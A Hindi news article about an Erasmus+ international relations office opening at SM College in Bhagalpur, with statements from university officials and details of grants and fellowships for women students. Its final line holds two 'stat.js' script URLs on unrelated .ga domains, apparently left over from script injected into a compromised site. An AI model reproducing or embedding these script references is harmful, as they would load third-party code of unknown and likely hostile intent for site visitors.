Wednesday, January 19

भागलपुर के छात्राओं के लिए सौगात, शहर में खुल गया ऑफिस ऑफ इंटरनेशनल रिलेशन का केंद्र

यूरोपियन देशों से शैक्षणिक आदान-प्रदान के लिए तिलकामांझी भागलपुर विश्वविद्यालय के सुंदरवती महिला कॉलेज में बुधवार को ऑफिस ऑफ इंटरनेशनल रिलेशन का केंद्र खुला। अब एसएम कॉलेज की छात्राएं यूरोप के कॉलेजों से ऑनलाइन पढ़ाई करेंगी। यूरोपियन हाईकमीशन की योजना (इरास्मस प्लस) का लाभ पूर्व बिहार, कोसी व सीमांचल से आकर एसएम कॉलेज में पढ़ने वाली छात्राओं को मिलेगा। कॉर्डिनेटर इरास्मस प्लस डॉ. एमआर हसन ने कहा कि एक माह के अंदर इस केंद्र का काम शुरू हो जाएगा।

कुलपति प्रो. एके राय ने केंद्र का उद्घाटन करते हुए कहा कि यह केंद्र न सिर्फ एसएम कॉलेज की छात्राओं, बल्कि शिक्षकों के लिए भी कई नए मौके खोलेगा। बिहार के विश्वविद्यालयों और कॉलेजों को इसमें पहल करनी चाहिए। प्रतिकुलपति प्रो. रामयतन प्रसाद ने कहा कि इस केंद्र से शैक्षणिक आदान-प्रदान के जरिये शिक्षा और सांस्कृतिक का विकास होगा। प्राचार्य डॉ. अर्चना ठाकुर ने कहा कि शिक्षक अपना शोध के लिए विदेशी विश्विवद्यालय के गाइड से संपर्क कर सकते हैं।

शिक्षा और खेल को बढ़ावा देने के लिए मिलेगा ग्रांट: इरास्मस प्लस योजना शिक्षा, युवा गतिविधि और खेल को बढ़ावा देने के लिए ग्रांट देती है। इससे न सिर्फ शैक्षणिक, बल्कि संकाय आदान प्रदान की प्रक्रिया भी अपनायी जाती है। इरास्मस प्लस में चयनित छात्रा और शिक्षकों को आगे दो से छह माह का फेलोशिप करने का मौका भी यूरोपियन देशों के उच्च शिक्षण संस्थानों में मिलेगा। सारी सुविधा यूरोपियन कमीशन द्वारा दिया जाएगा। यूरोपियन हाई कमीशन के अधिकारियों ने 2016 में बिहार एचआरडी के अधिकारियों के साथ शैक्षणिक आदान- प्रदान पर सहमति बनायी थी। पटना के एएन कॉलेज में यह केंद्र चल रहा है।

एसएम कॉलेज की छात्राओं को इरास्मस प्लस से जोड़ा जाएगा। इसमें छात्राएं अपने शोध या फिर विषय से जुड़ी अन्य जानकारियां ले सकती हैं। इसके लिए उन्हें इरास्मस प्लस से इनरोल कराया जाएगा। इरास्मस प्लस स्कीम के तहत एसएम कॉलेज की छात्राएं किसी भी तरह का शोध करना चाहती हैं तो उन्हें यूरोपियन कमीशन ग्रांट देगा। इसके लिए ऑनलाइन प्रोजेक्ट का डिटेल भेजना होगा। साथ ही शोध के बारे में बताना होगा।

चयन होने के बाद छात्राओं को आगे पढ़ाई या शोध के लिए बुलाया जाएगा। साथ ही उन्हें स्कॉलरशिप भी मिलेगी। इंटरनेशनल रिलेशन केंद्र से एसएम कॉलेज में पढ़ाये जाने वाले सभी विषयों को जोड़ा जाएगा। इस योजना के तहत पढ़ाई के साथ-साथ युवा गतिविधियों और खेल को भी बढ़ावा दिया जाएगा। छात्रों को विदेशी जमीन पर पढ़ाई का मौका मिलेगा। इससे वह नई तकनीक के बारे में जानकारी हासिल कर सकेंगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

%d bloggers like this: